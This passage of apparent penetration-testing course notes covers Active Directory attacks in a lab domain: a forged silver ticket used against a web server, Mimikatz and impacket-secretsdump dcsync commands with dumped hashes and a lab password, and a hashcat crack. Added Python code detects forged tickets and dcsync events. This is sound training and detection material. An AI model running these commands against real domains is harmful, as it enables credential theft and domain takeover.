PS C:\Tools> klist
Current LogonId is 0:0xa04cc
Cached Tickets: (1)
#0> Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 9/14/2022 4:37:32 (local)
End Time: 9/11/2032 4:37:32 (local)
Renew Time: 9/11/2032 4:37:32 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
{% endcode %}
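The klist output above carries the signs that this ticket never came from a KDC: a ten-year lifetime against a ten-hour policy default, an RC4 ticket key, and an empty Kdc Called. This added Python check (not from the page) parses klist output and reports those indicators; the policy defaults and the normal TGT in the sample are assumptions, and the forged ticket in the sample reproduces the values shown above.

```python
import re
from datetime import datetime, timedelta

# Domain Kerberos policy defaults (assumption: the policy was not changed):
# a ticket lives at most 10 hours and can be renewed for at most 7 days.
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)

# Constructed klist output: ticket #0 is a normal TGT (invented values),
# ticket #1 reproduces the forged service ticket shown above.
SAMPLE_KLIST = """\
Current LogonId is 0:0xa04cc

Cached Tickets: (2)

#0>     Client: jeff @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 9/14/2022 4:00:00 (local)
        End Time:   9/14/2022 14:00:00 (local)
        Renew Time: 9/21/2022 4:00:00 (local)
        Kdc Called: DC1.corp.com

#1>     Client: jeffadmin @ corp.com
        Server: http/web04.corp.com @ corp.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 9/14/2022 4:37:32 (local)
        End Time:   9/11/2032 4:37:32 (local)
        Renew Time: 9/11/2032 4:37:32 (local)
        Kdc Called:
"""


def _parse_time(value):
    """'9/14/2022 4:37:32 (local)' -> datetime."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def parse_klist(text):
    """Split klist output into one dict of 'Field: value' pairs per cached ticket."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if re.match(r"#\d+>", line):            # "#0>" starts a new ticket
            current = {}
            tickets.append(current)
            line = line.split(">", 1)[1].strip()
        if current is None:                     # header lines before the first ticket
            continue
        key, sep, value = line.partition(":")   # lines without ':' (Ticket Flags) are skipped
        if sep:
            current[key.strip()] = value.strip()
    return tickets


def ticket_findings(ticket):
    """Indicators that a cached ticket was forged and injected rather than issued by a KDC."""
    start = _parse_time(ticket["Start Time"])
    reasons = []
    if _parse_time(ticket["End Time"]) - start > MAX_TICKET_LIFETIME:
        reasons.append("lifetime exceeds the maximum ticket lifetime")
    if _parse_time(ticket["Renew Time"]) - start > MAX_RENEW_LIFETIME:
        reasons.append("renewal window exceeds the maximum renew lifetime")
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):
        reasons.append("RC4 ticket key, the type a ticket built from an NTLM hash carries")
    if not ticket.get("Kdc Called"):
        reasons.append("no KDC recorded, so the ticket was not requested from a DC")
    return reasons


def suspicious_tickets(text):
    """Map Server -> findings for every cached ticket with at least one indicator."""
    return {t["Server"]: f for t in parse_klist(text) if (f := ticket_findings(t))}
```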
{% code title="Accessing the web page of web04 with the silver ticket" overflow="wrap" lineNumbers="true" %}
PS C:\Tools> iwr -UseDefaultCredentials http://web04
StatusCode : 200
StatusDescription : OK
Content : <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont...
RawContent : HTTP/1.1 200 OK
Persistent-Auth: true
Accept-Ranges: bytes
Content-Length: 703
Content-Type: text/html
Date: Wed, 14 Sep 2022 11:37:39 GMT
ETag: "b752f823fc8d81:0"
Last-Modified: Wed, 14 Sep 20...
Forms :
Headers : {[Persistent-Auth, true], [Accept-Ranges, bytes], [Content-Length, 703], [Content-Type,
text/html]...}
Images : {}
InputFields : {}
Links : {@{outerHTML=<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img
src="iisstart.png" alt="IIS" width="960" height="600" /></a>; tagName=A;
href=http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409}}
ParsedHtml :
RawContentLength : 703
{% endcode %}
{% code title="Downloading the page to a file" overflow="wrap" lineNumbers="true" %}
iwr -UseDefaultCredentials http://web04 -Outfile file.html
{% endcode %}
To launch such a replication, a user needs to have the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.
{% code title=" Using Mimikatz to perform a dcsync attack to obtain the credentials of dave" overflow="wrap" lineNumbers="true" %}
PS C:\Users\jeffadmin> cd C:\Tools\
PS C:\Tools> .\mimikatz.exe
...
mimikatz # lsadump::dcsync /user:corp\dave
[DC] 'corp.com' will be the domain
[DC] 'DC1.corp.com' will be the DC server
[DC] 'corp\dave' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : dave
** SAM ACCOUNT **
SAM Username : dave
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00410200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD DONT_REQUIRE_PREAUTH )
Account expiration :
Password last change : 9/7/2022 9:54:57 AM
Object Security ID : S-1-5-21-1987370270-658905905-1781884369-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 0: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 1: a11e808659d5ec5b6c4f43c1e5a0972d
lm - 0: 45bc7d437911303a42e764eaf8fda43e
lm - 1: fdd7d20efbcaf626bd2ccedd49d9512d
...
{% endcode %}
{% code title="Using Hashcat to crack the NTLM hash obtained by the dcsync attack" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1
...
{% endcode %}
{% code title="Using Mimikatz to perform a dcsync attack to obtain the credentials of the domain administrator Administrator" overflow="wrap" lineNumbers="true" %}
mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...
{% endcode %}
{% code title="Using secretsdump to perform the dcsync attack to obtain the NTLM hash of dave" overflow="wrap" lineNumbers="true" %}
kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
[*] Kerberos keys grabbed
dave:aes256-cts-hmac-sha1-96:4d8d35c33875a543e3afa94974d738474a203cd74919173fd2a64570c51b1389
dave:aes128-cts-hmac-sha1-96:f94890e59afc170fd34cfbd7456d122b
dave:des-cbc-md5:1a329b4338bfa215
[*] Cleaning up...
{% endcode %}
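As an added detection example (not from the page), this Python flags Event ID 4662 records in which a principal other than a domain controller's computer account exercised the three replication rights named above, which is what a dcsync from jeffadmin's session leaves in the DC's Security log. The events, the DC list and the `NAME$` computer-account naming are constructed assumptions; the three rights GUIDs are the well-known schema values, not values from the page.

```python
import re

# Control-access-right GUIDs of the three replication rights named above
# (well-known AD schema values; they are not taken from the page).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "Replicating Directory Changes In Filtered Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample of Event ID 4662 records (not real logs), reduced to the
# fields a SIEM keeps. DC2$ replicating from DC1 is normal; a user account
# exercising the same rights against the domain object is the dcsync signature.
# The GUID in the last record is filler standing for some unrelated property.
SAMPLE_4662 = [
    {"SubjectUserName": "DC2$", "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jeffadmin", "SubjectDomainName": "CORP", "ObjectName": "DC=corp,DC=com",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"SubjectUserName": "dave", "SubjectDomainName": "CORP",
     "ObjectName": "CN=dave,CN=Users,DC=corp,DC=com",
     "Properties": "Write Property\n\t{11111111-2222-3333-4444-555555555555}"},
]


def replication_rights_used(event):
    """Names of the replication rights referenced in the event's Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(event["Properties"])
            if g.lower() in REPLICATION_RIGHTS]


def dcsync_candidates(events, domain_controllers):
    """4662 events where a principal other than a DC computer account used replication rights.

    domain_controllers: DC hostnames; their computer accounts are assumed to be NAME$.
    """
    expected = {dc.upper() + "$" for dc in domain_controllers}
    findings = []
    for ev in events:
        rights = replication_rights_used(ev)
        if not rights or ev["SubjectUserName"].upper() in expected:
            continue
        findings.append({"account": ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"],
                         "object": ev["ObjectName"], "rights": rights})
    return findings
```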